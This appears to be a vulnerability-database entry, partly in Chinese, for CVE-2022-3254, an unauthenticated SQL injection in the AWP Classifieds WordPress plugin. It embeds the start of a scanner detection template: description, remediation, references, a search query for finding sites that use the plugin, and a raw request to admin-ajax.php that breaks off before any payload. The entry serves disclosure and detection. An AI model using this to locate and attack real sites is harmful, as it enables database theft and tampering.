CVE-2022-3254: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
漏洞描述
WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active. [已公开] id: CVE-2022-3254 info: name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection author: Shivam Kamboj severity: critical description: | WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active. remediation: | Update to version 4.3 or later. impact: | Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-3254 - https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660 metadata: verified: true max-request: 2 publicwww-query: "plugins/another-wordpress-classifieds-plugin/" tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp http: - raw: - | GET /wp-admin/admin-ajax.php?action=a
影响范围
未知
修复建议
暂无